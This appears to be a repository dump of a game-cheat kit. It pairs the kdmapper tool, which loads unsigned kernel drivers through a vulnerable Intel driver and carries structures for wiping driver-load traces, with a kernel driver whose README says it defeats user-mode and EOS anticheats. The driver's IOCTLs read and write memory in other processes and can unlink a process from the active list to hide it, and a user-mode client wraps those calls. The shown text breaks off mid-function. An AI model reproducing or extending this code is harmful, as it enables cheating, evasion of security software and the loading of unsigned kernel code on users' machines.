├── kdmapper ├── service.hpp ├── kdmapper.hpp ├── portable_executable.hpp ├── utils.hpp ├── portable_executable.cpp ├── nt.hpp ├── utils.cpp ├── service.cpp ├── intel_driver.hpp ├── kdmapper.cpp └── intel_driver.cpp ├── project ├── driver.vcxproj.user ├── source │ ├── winver.h │ ├── entry.cpp │ └── definitions.h ├── driver.vcxproj.filters ├── driver.inf └── driver.vcxproj ├── README.md ├── Definitions.h ├── Communication.cpp ├── Communication.h └── raw_driver.h /kdmapper/service.hpp: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #include 3 | 4 | namespace service 5 | { 6 | bool RegisterAndStart(const std::wstring& driver_path, const std::wstring& serviceName); 7 | bool StopAndRemove(const std::wstring& serviceName); 8 | }; -------------------------------------------------------------------------------- /project/driver.vcxproj.user: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | true 5 | 6 | -------------------------------------------------------------------------------- /kdmapper/kdmapper.hpp: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | #include "intel_driver.hpp" 5 | 6 | namespace kdmapper 7 | { 8 | enum class AllocationMode 9 | { 10 | AllocatePool, 11 | AllocateIndependentPages 12 | }; 13 | 14 | typedef bool (*mapCallback)(ULONG64* param1, ULONG64* param2, ULONG64 allocationPtr, ULONG64 allocationSize); 15 | 16 | //Note: if you set PassAllocationAddressAsFirstParam as true, param1 will be ignored 17 | ULONG64 MapDriver(HANDLE iqvw64e_device_handle, BYTE* data, ULONG64 param1 = 0, ULONG64 param2 = 0, bool free = false, bool destroyHeader = true, AllocationMode mode = AllocationMode::AllocatePool, bool PassAllocationAddressAsFirstParam = false, mapCallback callback = nullptr, NTSTATUS* exitCode = nullptr); 18 | } -------------------------------------------------------------------------------- /project/source/winver.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #define win_1803 17134 4 | #define win_1809 17763 5 | #define win_1903 18362 6 | #define win_1909 18363 7 | #define win_2004 19041 8 | #define win_20H2 19569 9 | #define win_21H1 20180 10 | #define win_22H2 19045 11 | 12 | // 用于获取任何 Windows 版本中的用户目录偏移量 13 | SHORT get_windows_version() { 14 | RTL_OSVERSIONINFOW windows_version = {}; 15 | RtlGetVersion(&windows_version); 16 | 17 | switch (windows_version.dwBuildNumber) { 18 | case win_1803: 19 | case win_1809: 20 | return 0x0278; 21 | break; 22 | case win_1903: 23 | case win_1909: 24 | return 0x0280; 25 | break; 26 | case win_2004: 27 | case win_20H2: 28 | case win_21H1: 29 | case win_22H2: 30 | return 0x0388; 31 | break; 32 | default: 33 | return 0x0388; 34 | } 35 | } -------------------------------------------------------------------------------- /kdmapper/portable_executable.hpp: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #include 3 | #include 4 | #include 5 | 6 | namespace portable_executable 7 | { 8 | struct RelocInfo 9 | { 10 | ULONG64 address; 11 | USHORT* item; 12 | ULONG32 count; 13 | }; 14 | 15 | struct ImportFunctionInfo 16 | { 17 | std::string name; 18 | ULONG64* address; 19 | }; 20 | 21 | struct ImportInfo 22 | { 23 | std::string module_name; 24 | std::vector function_datas; 25 | }; 26 | 27 | using vec_sections = std::vector; 28 | using vec_relocs = std::vector; 29 | using vec_imports = std::vector; 30 | 31 | PIMAGE_NT_HEADERS64 GetNtHeaders(void* image_base); 32 | vec_relocs GetRelocs(void* image_base); 33 | vec_imports GetImports(void* image_base); 34 | } -------------------------------------------------------------------------------- /kdmapper/utils.hpp: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | #include 5 | #include 6 | #include 7 | 8 | #if defined(DISABLE_OUTPUT) 9 | #define Log(content) 10 | #else 11 | #define Log(content) std::wcout << content 12 | #endif 13 | 14 | namespace utils 15 | { 16 | std::wstring GetFullTempPath(); 17 | bool ReadFileToMemory(const std::wstring& file_path, std::vector* out_buffer); 18 | bool CreateFileFromMemory(const std::wstring& desired_file_path, const char* address, size_t size); 19 | uint64_t GetKernelModuleAddress(const std::string& module_name); 20 | BOOLEAN bDataCompare(const BYTE* pData, const BYTE* bMask, const char* szMask); 21 | uintptr_t FindPattern(uintptr_t dwAddress, uintptr_t dwLen, BYTE* bMask, const char* szMask); 22 | PVOID FindSection(const char* sectionName, uintptr_t modulePtr, PULONG size); 23 | std::wstring GetCurrentAppFolder(); 24 | } -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # RickOwens00 Driver 2 | 3 | ## discord: 359160088071766016 4 | 5 | ## Overview 6 | 7 | RickOwens00 is a kernel driver that works for UM anticheats and EOS anticheat. 8 | 9 | --- 10 | 11 | ## IOCTL Definitions 12 | 13 | | IOCTL Name | Code | Description | 14 | |-------------------|-------------|------------------------------------------| 15 | | `PRW_CODE` | 0x2ec33 | Physical memory read/write | 16 | | `VRW_ATTACH_CODE` | 0x2ec34 | Attach to process for virtual memory RW | 17 | | `VRW_CODE` | 0x2ec35 | Virtual memory read/write | 18 | | `BA_CODE` | 0x2ec36 | Get process base address | 19 | | `GR_CODE` | 0x2ec37 | Get guarded memory region | 20 | | `HF_CODE` | 0x2ec38 | Unlink a process from active list | 21 | | `SECURITY_CODE` | 0x94c9e4bc3 | Required for all valid requests | 22 | 23 | --- 24 | -------------------------------------------------------------------------------- /Definitions.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #include 3 | #include 4 | #include 5 | 6 | #define PRW_CODE CTL_CODE(FILE_DEVICE_UNKNOWN, 0x2ec33, METHOD_BUFFERED, FILE_SPECIAL_ACCESS) 7 | #define VRW_ATTACH_CODE CTL_CODE(FILE_DEVICE_UNKNOWN, 0x2ec34, METHOD_BUFFERED, FILE_SPECIAL_ACCESS) 8 | #define VRW_CODE CTL_CODE(FILE_DEVICE_UNKNOWN, 0x2ec35, METHOD_BUFFERED, FILE_SPECIAL_ACCESS) 9 | #define BA_CODE CTL_CODE(FILE_DEVICE_UNKNOWN, 0x2ec36, METHOD_BUFFERED, FILE_SPECIAL_ACCESS) 10 | #define SECURITY_CODE 0x94c9e4bc3 11 | 12 | #define sleep_ms(ms) std::this_thread::sleep_for(std::chrono::milliseconds(ms)) 13 | 14 | typedef char i8; 15 | typedef short i16; 16 | typedef int i32; 17 | typedef long long i64; 18 | 19 | typedef unsigned char u8; 20 | typedef unsigned short u16; 21 | typedef unsigned int u32; 22 | typedef unsigned long long u64; 23 | 24 | typedef float f32; 25 | typedef double f64; 26 | 27 | typedef const char* cstr; 28 | typedef std::string str; 29 | 30 | struct _PRW { 31 | u64 securityCode; 32 | 33 | i32 processId; 34 | void* address; 35 | void* buffer; 36 | 37 | u64 size; 38 | u64 returnSize; 39 | 40 | bool type; 41 | }; 42 | 43 | struct _VRW { 44 | u64 securityCode; 45 | 46 | HANDLE processHandle; 47 | void* address; 48 | void* buffer; 49 | 50 | u64 size; 51 | u64 returnSize; 52 | 53 | bool type; 54 | }; 55 | 56 | struct _BA { 57 | u64 securityCode; 58 | 59 | i32 processId; 60 | u64* address; 61 | }; 62 | -------------------------------------------------------------------------------- /project/source/entry.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include "definitions.h" 3 | 4 | NTSTATUS driver_initialize(PDRIVER_OBJECT driver_object, PUNICODE_STRING registry_path) { 5 | UNREFERENCED_PARAMETER(registry_path); 6 | 7 | NTSTATUS status = STATUS_UNSUCCESSFUL; 8 | 9 | UNICODE_STRING device_name = {}; 10 | RtlInitUnicodeString(&device_name, DEVICE_NAME); 11 | 12 | PDEVICE_OBJECT device_object = nullptr; 13 | 14 | status = IoCreateDevice(driver_object, NULL, &device_name, FILE_DEVICE_UNKNOWN, FILE_DEVICE_SECURE_OPEN, FALSE, &device_object); 15 | if (!NT_SUCCESS(status)) return status; 16 | 17 | UNICODE_STRING symbolic_link = {}; 18 | RtlInitUnicodeString(&symbolic_link, SYMBOLIC_LINK); 19 | 20 | status = IoCreateSymbolicLink(&symbolic_link, &device_name); 21 | if (!NT_SUCCESS(status)) return status; 22 | 23 | SetFlag(device_object->Flags, DO_BUFFERED_IO); 24 | 25 | driver_object->MajorFunction[IRP_MJ_CREATE] = major_functions::dispatcher; 26 | driver_object->MajorFunction[IRP_MJ_CLOSE] = major_functions::dispatcher; 27 | driver_object->MajorFunction[IRP_MJ_DEVICE_CONTROL] = major_functions::io_controller; 28 | driver_object->DriverUnload = nullptr; 29 | 30 | ClearFlag(device_object->Flags, DO_DIRECT_IO); 31 | ClearFlag(device_object->Flags, DO_DEVICE_INITIALIZING); 32 | 33 | return STATUS_SUCCESS; 34 | } 35 | 36 | NTSTATUS DriverEntry() { 37 | UNICODE_STRING driver_name = {}; 38 | RtlInitUnicodeString(&driver_name, DRIVER_NAME); 39 | 40 | return IoCreateDriver(&driver_name, &driver_initialize); 41 | } -------------------------------------------------------------------------------- /project/driver.vcxproj.filters: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hpp;hxx;hm;inl;inc;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | {8E41214B-6785-4CFE-B992-037D68949A14} 18 | inf;inv;inx;mof;mc; 19 | 20 | 21 | 22 | 23 | Driver Files 24 | 25 | 26 | 27 | 28 | Source Files 29 | 30 | 31 | 32 | 33 | Header Files 34 | 35 | 36 | Header Files 37 | 38 | 39 | -------------------------------------------------------------------------------- /project/driver.inf: -------------------------------------------------------------------------------- 1 | ; 2 | ; driver.inf 3 | ; 4 | 5 | [Version] 6 | Signature = "$WINDOWS NT$" 7 | Class = System ; TODO: specify appropriate Class 8 | ClassGuid = {4d36e97d-e325-11ce-bfc1-08002be10318} ; TODO: specify appropriate ClassGuid 9 | Provider = %ManufacturerName% 10 | CatalogFile = driver.cat 11 | DriverVer = ; TODO: set DriverVer in stampinf property pages 12 | PnpLockdown = 1 13 | 14 | [DestinationDirs] 15 | DefaultDestDir = 13 16 | 17 | [SourceDisksNames] 18 | 1 = %DiskName%,,,"" 19 | 20 | [SourceDisksFiles] 21 | driver.sys = 1,, 22 | 23 | ;***************************************** 24 | ; Install Section 25 | ;***************************************** 26 | 27 | [Manufacturer] 28 | %ManufacturerName% = Standard,NT$ARCH$.10.0...16299 ; %13% support introduced in build 16299 29 | 30 | [Standard.NT$ARCH$.10.0...16299] 31 | %driver.DeviceDesc% = driver_Device, Root\driver ; TODO: edit hw-id 32 | 33 | [driver_Device.NT] 34 | CopyFiles = File_Copy 35 | 36 | [File_Copy] 37 | driver.sys 38 | 39 | ;-------------- Service installation 40 | [driver_Device.NT.Services] 41 | AddService = driver,%SPSVCINST_ASSOCSERVICE%, driver_Service_Inst 42 | 43 | ; -------------- driver driver install sections 44 | [driver_Service_Inst] 45 | DisplayName = %driver.SVCDESC% 46 | ServiceType = 1 ; SERVICE_KERNEL_DRIVER 47 | StartType = 3 ; SERVICE_DEMAND_START 48 | ErrorControl = 1 ; SERVICE_ERROR_NORMAL 49 | ServiceBinary = %13%\driver.sys 50 | 51 | [driver_Device.NT.Wdf] 52 | KmdfService = driver, driver_wdfsect 53 | 54 | [driver_wdfsect] 55 | KmdfLibraryVersion = $KMDFVERSION$ 56 | 57 | [Strings] 58 | SPSVCINST_ASSOCSERVICE = 0x00000002 59 | ManufacturerName = "" ;TODO: Replace with your manufacturer name 60 | DiskName = "driver Installation Disk" 61 | driver.DeviceDesc = "driver Device" 62 | driver.SVCDESC = "driver Service" 63 | -------------------------------------------------------------------------------- /Communication.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | communication::communication() { 4 | driver_handle = CreateFileA("\\\\.\\RickOwens00", GENERIC_READ | GENERIC_WRITE, 5 | FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 0, NULL); 6 | } 7 | 8 | communication::~communication() { 9 | if (driver_handle != INVALID_HANDLE_VALUE) { 10 | CloseHandle(driver_handle); 11 | } 12 | } 13 | 14 | bool communication::is_connected() { 15 | return (driver_handle != INVALID_HANDLE_VALUE); 16 | } 17 | 18 | bool communication::v_attach(i32 process_id) { 19 | _VRW arguments; 20 | arguments.process_handle = reinterpret_cast(process_id); 21 | 22 | return DeviceIoControl(driver_handle, VRW_ATTACH_CODE, &arguments, sizeof(arguments), &arguments, sizeof(arguments), nullptr, nullptr); 23 | } 24 | 25 | std::string communication::readstr(u64 address) { 26 | i32 StrLength = read(address + 0x18); 27 | 28 | if (StrLength >= 16) { 29 | address = read(address); 30 | } 31 | 32 | std::vector Buffer(256); 33 | 34 | _PRW arguments = {}; 35 | arguments.security_code = SECURITY_CODE; 36 | arguments.address = reinterpret_cast(address); 37 | arguments.buffer = Buffer.data(); 38 | arguments.size = Buffer.size(); 39 | arguments.process_id = process_id; 40 | arguments.Type = false; 41 | 42 | DeviceIoControl(driver_handle, PRW_CODE, &arguments, sizeof(arguments), nullptr, NULL, NULL, NULL); 43 | 44 | return std::string(Buffer.data()); 45 | } 46 | 47 | i32 communication::find_process(const i8* process_name) { 48 | PROCESSENTRY32 process_entry = {}; 49 | process_entry.dwSize = sizeof(PROCESSENTRY32); 50 | 51 | HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); 52 | if (snapshot == INVALID_HANDLE_VALUE) { 53 | return 0; 54 | } 55 | 56 | if (Process32First(snapshot, &process_entry)) { 57 | do { 58 | if (_stricmp(process_entry.szExeFile, process_name) == 0) { 59 | process_id = process_entry.th32ProcessID; 60 | break; 61 | } 62 | } while (Process32Next(snapshot, &process_entry)); 63 | } 64 | 65 | CloseHandle(snapshot); 66 | 67 | return process_id; 68 | } 69 | 70 | u64 communication::find_image() { 71 | u64 image_address = 0; 72 | _BA arguments = {}; 73 | arguments.security_code = SECURITY_CODE; 74 | arguments.process_id = process_id; 75 | arguments.address = &image_address; 76 | 77 | DeviceIoControl(driver_handle, BA_CODE, &arguments, sizeof(arguments), nullptr, NULL, NULL, NULL); 78 | 79 | communication::image_address = image_address; 80 | 81 | return image_address; 82 | } 83 | -------------------------------------------------------------------------------- /Communication.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #include 3 | #include 4 | #include 5 | #include 6 | 7 | #include 8 | 9 | #define PRW_CODE CTL_CODE(FILE_DEVICE_UNKNOWN, 0x2ec33, METHOD_BUFFERED, FILE_SPECIAL_ACCESS) 10 | #define VRW_ATTACH_CODE CTL_CODE(FILE_DEVICE_UNKNOWN, 0x2ec34, METHOD_BUFFERED, FILE_SPECIAL_ACCESS) 11 | #define VRW_CODE CTL_CODE(FILE_DEVICE_UNKNOWN, 0x2ec35, METHOD_BUFFERED, FILE_SPECIAL_ACCESS) 12 | #define BA_CODE CTL_CODE(FILE_DEVICE_UNKNOWN, 0x2ec36, METHOD_BUFFERED, FILE_SPECIAL_ACCESS) 13 | #define SECURITY_CODE 0x94c9e4bc3 14 | 15 | struct _PRW { 16 | u64 security_code; 17 | 18 | i32 process_id; 19 | void* address; 20 | void* buffer; 21 | 22 | u64 size; 23 | u64 return_size; 24 | 25 | bool Type; 26 | }; 27 | 28 | struct _VRW { 29 | u64 security_code; 30 | 31 | HANDLE process_handle; 32 | void* address; 33 | void* buffer; 34 | 35 | u64 size; 36 | u64 return_size; 37 | 38 | bool Type; 39 | }; 40 | 41 | struct _BA { 42 | u64 security_code; 43 | 44 | i32 process_id; 45 | u64* address; 46 | }; 47 | 48 | class communication { 49 | public: 50 | communication(); 51 | ~communication(); 52 | 53 | bool is_connected(); 54 | 55 | bool v_attach(i32 process_id); 56 | 57 | i32 find_process(const i8* ProcessName); // UM 58 | u64 find_image(); 59 | 60 | template 61 | T v_read(u64 address); 62 | template 63 | void v_write(u64 address, T& Value); 64 | 65 | template 66 | T read(u64 address); 67 | template 68 | void write(u64 address, T& Value); 69 | 70 | std::string readstr(u64 address); 71 | 72 | u64 image_address = 0; 73 | i32 process_id = 0; 74 | private: 75 | HANDLE driver_handle = INVALID_HANDLE_VALUE; 76 | }; 77 | 78 | template 79 | T communication::v_read(u64 address) { 80 | T temp = {}; 81 | 82 | _VRW arguments; 83 | arguments.security_code = SECURITY_CODE; 84 | arguments.address = reinterpret_cast(address); 85 | arguments.buffer = &temp; 86 | arguments.size = sizeof(T); 87 | arguments.Type = false; 88 | 89 | DeviceIoControl(driver_handle, VRW_CODE, &arguments, sizeof(arguments), &arguments, sizeof(arguments), nullptr, nullptr); 90 | return temp; 91 | } 92 | 93 | template 94 | void communication::v_write(u64 address, T& value) { 95 | _VRW arguments; 96 | arguments.security_code = SECURITY_CODE; 97 | arguments.address = reinterpret_cast(address); 98 | arguments.buffer = (void*)&value; 99 | arguments.size = sizeof(T); 100 | arguments.Type = true; 101 | 102 | DeviceIoControl(driver_handle, VRW_CODE, &arguments, sizeof(arguments), &arguments, sizeof(arguments), nullptr, nullptr); 103 | } 104 | 105 | template 106 | T communication::read(u64 address) { 107 | T temp = {}; 108 | 109 | _PRW arguments = {}; 110 | arguments.security_code = SECURITY_CODE; 111 | arguments.address = reinterpret_cast(address); 112 | arguments.buffer = &temp; 113 | arguments.size = sizeof(T); 114 | arguments.process_id = process_id; 115 | arguments.Type = false; 116 | 117 | DeviceIoControl(driver_handle, PRW_CODE, &arguments, sizeof(arguments), nullptr, NULL, NULL, NULL); 118 | 119 | return temp; 120 | } 121 | 122 | template 123 | void communication::write(u64 address, T& value) { 124 | _PRW arguments = {}; 125 | arguments.security_code = SECURITY_CODE; 126 | arguments.address = reinterpret_cast(address); 127 | arguments.buffer = (void*)&value; 128 | arguments.size = sizeof(T); 129 | arguments.process_id = process_id; 130 | arguments.Type = true; 131 | 132 | DeviceIoControl(driver_handle, PRW_CODE, &arguments, sizeof(arguments), nullptr, NULL, NULL, NULL); 133 | } 134 | -------------------------------------------------------------------------------- /kdmapper/portable_executable.cpp: -------------------------------------------------------------------------------- 1 | #include "portable_executable.hpp" 2 | 3 | #include 4 | #include 5 | 6 | 7 | PIMAGE_NT_HEADERS64 portable_executable::GetNtHeaders(void* image_base) { 8 | const auto dos_header = reinterpret_cast(image_base); 9 | 10 | if (dos_header->e_magic != IMAGE_DOS_SIGNATURE) 11 | return nullptr; 12 | 13 | const auto nt_headers = reinterpret_cast(reinterpret_cast(image_base) + dos_header->e_lfanew); 14 | 15 | if (nt_headers->Signature != IMAGE_NT_SIGNATURE) 16 | return nullptr; 17 | 18 | return nt_headers; 19 | } 20 | 21 | portable_executable::vec_relocs portable_executable::GetRelocs(void* image_base) { 22 | const PIMAGE_NT_HEADERS64 nt_headers = GetNtHeaders(image_base); 23 | 24 | if (!nt_headers) 25 | return {}; 26 | 27 | vec_relocs relocs; 28 | DWORD reloc_va = nt_headers->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress; 29 | 30 | if (!reloc_va) //Fix from @greetmark of UnknownCheats Forum 31 | return {}; 32 | 33 | auto current_base_relocation = reinterpret_cast(reinterpret_cast(image_base) + reloc_va); 34 | const auto reloc_end = reinterpret_cast(reinterpret_cast(current_base_relocation) + nt_headers->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].Size); 35 | 36 | while (current_base_relocation < reloc_end && current_base_relocation->SizeOfBlock) { 37 | RelocInfo reloc_info; 38 | 39 | reloc_info.address = reinterpret_cast(image_base) + current_base_relocation->VirtualAddress; 40 | reloc_info.item = reinterpret_cast(reinterpret_cast(current_base_relocation) + sizeof(IMAGE_BASE_RELOCATION)); 41 | reloc_info.count = (current_base_relocation->SizeOfBlock - sizeof(IMAGE_BASE_RELOCATION)) / sizeof(USHORT); 42 | 43 | relocs.push_back(reloc_info); 44 | 45 | current_base_relocation = reinterpret_cast(reinterpret_cast(current_base_relocation) + current_base_relocation->SizeOfBlock); 46 | } 47 | 48 | return relocs; 49 | } 50 | 51 | portable_executable::vec_imports portable_executable::GetImports(void* image_base) { 52 | const PIMAGE_NT_HEADERS64 nt_headers = GetNtHeaders(image_base); 53 | 54 | if (!nt_headers) 55 | return {}; 56 | 57 | DWORD import_va = nt_headers->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress; 58 | 59 | //not imports necesary 60 | if (!import_va) 61 | return {}; 62 | 63 | vec_imports imports; 64 | 65 | auto current_import_descriptor = reinterpret_cast(reinterpret_cast(image_base) + import_va); 66 | 67 | while (current_import_descriptor->FirstThunk) { 68 | ImportInfo import_info; 69 | 70 | import_info.module_name = std::string(reinterpret_cast(reinterpret_cast(image_base) + current_import_descriptor->Name)); 71 | 72 | auto current_first_thunk = reinterpret_cast(reinterpret_cast(image_base) + current_import_descriptor->FirstThunk); 73 | auto current_originalFirstThunk = reinterpret_cast(reinterpret_cast(image_base) + current_import_descriptor->OriginalFirstThunk); 74 | 75 | while (current_originalFirstThunk->u1.Function) { 76 | ImportFunctionInfo import_function_data; 77 | 78 | auto thunk_data = reinterpret_cast(reinterpret_cast(image_base) + current_originalFirstThunk->u1.AddressOfData); 79 | 80 | import_function_data.name = thunk_data->Name; 81 | import_function_data.address = ¤t_first_thunk->u1.Function; 82 | 83 | import_info.function_datas.push_back(import_function_data); 84 | 85 | ++current_originalFirstThunk; 86 | ++current_first_thunk; 87 | } 88 | 89 | imports.push_back(import_info); 90 | ++current_import_descriptor; 91 | } 92 | 93 | return imports; 94 | } -------------------------------------------------------------------------------- /kdmapper/nt.hpp: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #include 3 | #include 4 | #pragma comment(lib, "ntdll.lib") 5 | 6 | namespace nt 7 | { 8 | constexpr auto STATUS_INFO_LENGTH_MISMATCH = 0xC0000004; 9 | 10 | constexpr auto SystemModuleInformation = 11; 11 | constexpr auto SystemExtendedHandleInformation = 64; 12 | 13 | extern "C" NTSTATUS NtLoadDriver(PUNICODE_STRING DriverServiceName); 14 | extern "C" NTSTATUS NtUnloadDriver(PUNICODE_STRING DriverServiceName); 15 | extern "C" NTSTATUS RtlAdjustPrivilege(ULONG Privilege, BOOLEAN Enable, BOOLEAN Client, BOOLEAN* WasEnabled); 16 | 17 | 18 | typedef struct _SYSTEM_HANDLE 19 | { 20 | PVOID Object; 21 | HANDLE UniqueProcessId; 22 | HANDLE HandleValue; 23 | ULONG GrantedAccess; 24 | USHORT CreatorBackTraceIndex; 25 | USHORT ObjectTypeIndex; 26 | ULONG HandleAttributes; 27 | ULONG Reserved; 28 | } SYSTEM_HANDLE, *PSYSTEM_HANDLE; 29 | 30 | typedef struct _SYSTEM_HANDLE_INFORMATION_EX 31 | { 32 | ULONG_PTR HandleCount; 33 | ULONG_PTR Reserved; 34 | SYSTEM_HANDLE Handles[1]; 35 | } SYSTEM_HANDLE_INFORMATION_EX, *PSYSTEM_HANDLE_INFORMATION_EX; 36 | 37 | //Thanks to Pvt Comfy for remember to update this https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/wdm/ne-wdm-_pool_type 38 | typedef enum class _POOL_TYPE { 39 | NonPagedPool, 40 | NonPagedPoolExecute = NonPagedPool, 41 | PagedPool, 42 | NonPagedPoolMustSucceed = NonPagedPool + 2, 43 | DontUseThisType, 44 | NonPagedPoolCacheAligned = NonPagedPool + 4, 45 | PagedPoolCacheAligned, 46 | NonPagedPoolCacheAlignedMustS = NonPagedPool + 6, 47 | MaxPoolType, 48 | NonPagedPoolBase = 0, 49 | NonPagedPoolBaseMustSucceed = NonPagedPoolBase + 2, 50 | NonPagedPoolBaseCacheAligned = NonPagedPoolBase + 4, 51 | NonPagedPoolBaseCacheAlignedMustS = NonPagedPoolBase + 6, 52 | NonPagedPoolSession = 32, 53 | PagedPoolSession = NonPagedPoolSession + 1, 54 | NonPagedPoolMustSucceedSession = PagedPoolSession + 1, 55 | DontUseThisTypeSession = NonPagedPoolMustSucceedSession + 1, 56 | NonPagedPoolCacheAlignedSession = DontUseThisTypeSession + 1, 57 | PagedPoolCacheAlignedSession = NonPagedPoolCacheAlignedSession + 1, 58 | NonPagedPoolCacheAlignedMustSSession = PagedPoolCacheAlignedSession + 1, 59 | NonPagedPoolNx = 512, 60 | NonPagedPoolNxCacheAligned = NonPagedPoolNx + 4, 61 | NonPagedPoolSessionNx = NonPagedPoolNx + 32, 62 | } POOL_TYPE; 63 | 64 | typedef struct _RTL_PROCESS_MODULE_INFORMATION 65 | { 66 | HANDLE Section; 67 | PVOID MappedBase; 68 | PVOID ImageBase; 69 | ULONG ImageSize; 70 | ULONG Flags; 71 | USHORT LoadOrderIndex; 72 | USHORT InitOrderIndex; 73 | USHORT LoadCount; 74 | USHORT OffsetToFileName; 75 | UCHAR FullPathName[256]; 76 | } RTL_PROCESS_MODULE_INFORMATION, *PRTL_PROCESS_MODULE_INFORMATION; 77 | 78 | typedef struct _RTL_PROCESS_MODULES 79 | { 80 | ULONG NumberOfModules; 81 | RTL_PROCESS_MODULE_INFORMATION Modules[1]; 82 | } RTL_PROCESS_MODULES, *PRTL_PROCESS_MODULES; 83 | 84 | typedef struct _HashBucketEntry 85 | { 86 | struct _HashBucketEntry* Next; 87 | UNICODE_STRING DriverName; 88 | ULONG CertHash[5]; 89 | } HashBucketEntry, * PHashBucketEntry; 90 | 91 | 92 | typedef struct _RTL_BALANCED_LINKS { 93 | struct _RTL_BALANCED_LINKS* Parent; 94 | struct _RTL_BALANCED_LINKS* LeftChild; 95 | struct _RTL_BALANCED_LINKS* RightChild; 96 | CHAR Balance; 97 | UCHAR Reserved[3]; 98 | } RTL_BALANCED_LINKS; 99 | typedef RTL_BALANCED_LINKS* PRTL_BALANCED_LINKS; 100 | 101 | typedef struct _RTL_AVL_TABLE { 102 | RTL_BALANCED_LINKS BalancedRoot; 103 | PVOID OrderedPointer; 104 | ULONG WhichOrderedElement; 105 | ULONG NumberGenericTableElements; 106 | ULONG DepthOfTree; 107 | PVOID RestartKey; 108 | ULONG DeleteCount; 109 | PVOID CompareRoutine; 110 | PVOID AllocateRoutine; 111 | PVOID FreeRoutine; 112 | PVOID TableContext; 113 | } RTL_AVL_TABLE; 114 | typedef RTL_AVL_TABLE* PRTL_AVL_TABLE; 115 | 116 | typedef struct _PiDDBCacheEntry 117 | { 118 | LIST_ENTRY List; 119 | UNICODE_STRING DriverName; 120 | ULONG TimeDateStamp; 121 | NTSTATUS LoadStatus; 122 | char _0x0028[16]; // data from the shim engine, or uninitialized memory for custom drivers 123 | } PiDDBCacheEntry, * NPiDDBCacheEntry; 124 | } 125 | -------------------------------------------------------------------------------- /kdmapper/utils.cpp: -------------------------------------------------------------------------------- 1 | #include "utils.hpp" 2 | #include 3 | #include 4 | #include 5 | #include 6 | 7 | #include "nt.hpp" 8 | 9 | std::wstring utils::GetFullTempPath() { 10 | wchar_t temp_directory[MAX_PATH + 1] = { 0 }; 11 | const uint32_t get_temp_path_ret = GetTempPathW(sizeof(temp_directory) / 2, temp_directory); 12 | if (!get_temp_path_ret || get_temp_path_ret > MAX_PATH + 1) { 13 | Log(L"[-] Failed to get temp path" << std::endl); 14 | return L""; 15 | } 16 | if (temp_directory[wcslen(temp_directory) - 1] == L'\\') 17 | temp_directory[wcslen(temp_directory) - 1] = 0x0; 18 | 19 | return std::wstring(temp_directory); 20 | } 21 | 22 | bool utils::ReadFileToMemory(const std::wstring& file_path, std::vector* out_buffer) { 23 | std::ifstream file_ifstream(file_path, std::ios::binary); 24 | 25 | if (!file_ifstream) 26 | return false; 27 | 28 | out_buffer->assign((std::istreambuf_iterator(file_ifstream)), std::istreambuf_iterator()); 29 | file_ifstream.close(); 30 | 31 | return true; 32 | } 33 | 34 | bool utils::CreateFileFromMemory(const std::wstring& desired_file_path, const char* address, size_t size) { 35 | std::ofstream file_ofstream(desired_file_path.c_str(), std::ios_base::out | std::ios_base::binary); 36 | 37 | if (!file_ofstream.write(address, size)) { 38 | file_ofstream.close(); 39 | return false; 40 | } 41 | 42 | file_ofstream.close(); 43 | return true; 44 | } 45 | 46 | uint64_t utils::GetKernelModuleAddress(const std::string& module_name) { 47 | void* buffer = nullptr; 48 | DWORD buffer_size = 0; 49 | 50 | NTSTATUS status = NtQuerySystemInformation(static_cast(nt::SystemModuleInformation), buffer, buffer_size, &buffer_size); 51 | 52 | while (status == nt::STATUS_INFO_LENGTH_MISMATCH) { 53 | if (buffer != nullptr) 54 | VirtualFree(buffer, 0, MEM_RELEASE); 55 | 56 | buffer = VirtualAlloc(nullptr, buffer_size, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE); 57 | status = NtQuerySystemInformation(static_cast(nt::SystemModuleInformation), buffer, buffer_size, &buffer_size); 58 | } 59 | 60 | if (!NT_SUCCESS(status)) { 61 | if (buffer != nullptr) 62 | VirtualFree(buffer, 0, MEM_RELEASE); 63 | return 0; 64 | } 65 | 66 | const auto modules = static_cast(buffer); 67 | if (!modules) 68 | return 0; 69 | 70 | for (auto i = 0u; i < modules->NumberOfModules; ++i) { 71 | const std::string current_module_name = std::string(reinterpret_cast(modules->Modules[i].FullPathName) + modules->Modules[i].OffsetToFileName); 72 | 73 | if (!_stricmp(current_module_name.c_str(), module_name.c_str())) 74 | { 75 | const uint64_t result = reinterpret_cast(modules->Modules[i].ImageBase); 76 | 77 | VirtualFree(buffer, 0, MEM_RELEASE); 78 | return result; 79 | } 80 | } 81 | 82 | VirtualFree(buffer, 0, MEM_RELEASE); 83 | return 0; 84 | } 85 | 86 | BOOLEAN utils::bDataCompare(const BYTE* pData, const BYTE* bMask, const char* szMask) { 87 | for (; *szMask; ++szMask, ++pData, ++bMask) 88 | 